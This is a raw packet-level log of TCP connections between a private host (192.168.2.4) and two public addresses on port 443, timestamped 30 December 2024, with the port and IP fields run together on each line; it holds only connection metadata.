                                                                                                              Dec 30, 2024 11:36:09.867433071 CET49816443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:09.867453098 CET44349816142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:09.867592096 CET49816443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:09.867609978 CET44349816142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:09.903328896 CET44349815142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:09.903335094 CET44349817142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.157401085 CET44349815142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.157470942 CET49815443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.158314943 CET44349815142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.158380032 CET44349815142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.158427954 CET49815443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.158427954 CET49815443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.169864893 CET49815443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.169864893 CET49815443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.169908047 CET44349815142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.170442104 CET49815443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.170609951 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.170660973 CET44349821142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.170741081 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.171358109 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.171370029 CET44349821142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.219978094 CET44349816142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.220042944 CET44349816142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.220057011 CET49816443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.220073938 CET44349816142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.220093012 CET49816443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.220180988 CET44349816142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.220225096 CET49816443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.220225096 CET49816443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.226864100 CET49816443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.226886988 CET44349816142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.228104115 CET49822443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.228152990 CET44349822142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.228226900 CET49822443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.232197046 CET49822443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.232208014 CET44349822142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.324325085 CET44349817142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.324419022 CET49817443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.324506998 CET49817443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.324559927 CET44349817142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.324620962 CET49817443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.325036049 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.325087070 CET44349824142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.325158119 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.325376034 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.325390100 CET44349824142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.408514023 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.408607006 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.409205914 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.409215927 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.409337997 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.409343958 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.801590919 CET44349821142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.801695108 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.802365065 CET44349821142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.802417994 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.804230928 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.804244041 CET44349821142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.804549932 CET44349821142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.804621935 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.805445910 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.808082104 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.808144093 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.808186054 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.808186054 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.808198929 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.808275938 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.808283091 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.808301926 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.808339119 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.808340073 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.809467077 CET49818443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.809479952 CET44349818142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.810511112 CET49825443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.810559034 CET44349825142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.811781883 CET49825443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.811903000 CET49825443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.811918020 CET44349825142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.841854095 CET44349822142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.841928959 CET49822443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.842425108 CET49822443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.842437029 CET44349822142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.844949007 CET49822443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:10.844955921 CET44349822142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.851330996 CET44349821142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.934175968 CET44349824142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.934282064 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.934940100 CET44349824142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.934983969 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.936835051 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.936846972 CET44349824142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.937196970 CET44349824142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:10.937263012 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.937645912 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:10.979336023 CET44349824142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.161591053 CET49821443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.161808968 CET49822443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:11.161823988 CET49824443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.163578033 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.163582087 CET49825443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:11.163611889 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.163781881 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.164906979 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.164916992 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.165437937 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.165476084 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.165555000 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.166207075 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.166218996 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.772969007 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.773917913 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.774898052 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.774909019 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.777676105 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.777689934 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.787920952 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.788424969 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.789028883 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.789036036 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:11.789073944 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:11.789077997 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.139509916 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.139770031 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.139799118 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.139965057 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.139965057 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.140069962 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.140459061 CET44349827142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.140482903 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.140517950 CET49827443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.140603065 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.140652895 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.140734911 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.140866041 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.140908003 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.141031027 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.141056061 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.141076088 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.141431093 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.141444921 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.168878078 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.170546055 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.170659065 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.259803057 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.259803057 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.259848118 CET44349826142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.260030985 CET49826443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.260768890 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.260796070 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.260826111 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.260890007 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.260962009 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.261008024 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.261308908 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.261328936 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.264411926 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.264486074 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.751357079 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.751451015 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.751918077 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.751991034 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.752140999 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.752235889 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.755945921 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.755959988 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.756388903 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.756438971 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.756813049 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.756828070 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.756891966 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.757200003 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.757255077 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.757709026 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.799371958 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.803325891 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.873200893 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.873270988 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.873981953 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.874057055 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.876106977 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.876116991 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.876374960 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.876436949 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.877006054 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:12.881846905 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.881918907 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.883419037 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.883426905 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.883686066 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.883748055 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.884287119 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:12.919337034 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:12.927366972 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.126903057 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.126996040 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.127088070 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.127298117 CET44349829142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.127358913 CET49829443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.127628088 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.127679110 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.127734900 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.127898932 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.127908945 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.170625925 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.170681953 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.170691013 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.170711994 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.170722961 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.170758009 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.170763016 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.170800924 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.170808077 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.170820951 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.170865059 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.171892881 CET49830443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.171915054 CET44349830142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.172674894 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.172734022 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.172802925 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.172986984 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.172997952 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.257427931 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.257493973 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.257531881 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.257574081 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.258097887 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.258141994 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.258142948 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.258203030 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.258683920 CET49833443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.258711100 CET44349833142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.259291887 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.259345055 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.259411097 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.259706020 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.259716988 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.322161913 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.322211027 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.322233915 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.322244883 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.322272062 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.322297096 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.322300911 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.322330952 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.322352886 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.322381973 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.339993954 CET49832443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.340023041 CET44349832142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.340637922 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.340701103 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.340797901 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.341201067 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.341219902 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.727802038 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.728081942 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.728373051 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.728384972 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.730190039 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.730197906 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.782735109 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.783030033 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.783519030 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.783530951 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.783715963 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.783723116 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.867885113 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.868065119 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.868508101 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.868520021 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.868690014 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:13.868695974 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.944343090 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.944534063 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.945024014 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.945043087 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:13.945173979 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:13.945184946 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.201081991 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.201141119 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.201164007 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.201193094 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.201215029 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.201266050 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.201287031 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.202881098 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.202881098 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.233571053 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.233737946 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.233768940 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.233828068 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.233896971 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.233932018 CET44349837142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.234024048 CET49837443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.234381914 CET49842443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.234432936 CET44349842142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.234666109 CET49842443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.234797001 CET49842443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.234812021 CET44349842142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.236059904 CET49843443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.236097097 CET44349843142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.236171961 CET49843443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.236479998 CET49843443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.236496925 CET44349843142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.356369972 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.356415987 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.356498957 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.356498957 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.356508970 CET44349840142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.357191086 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.357191086 CET49840443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.558876038 CET49836443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:14.558923006 CET44349836142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.566968918 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.567044973 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.567084074 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.567131042 CET44349835142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:14.567131042 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.568439960 CET49835443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:14.576530933 CET49835443192.168.2.4142.250.186.142
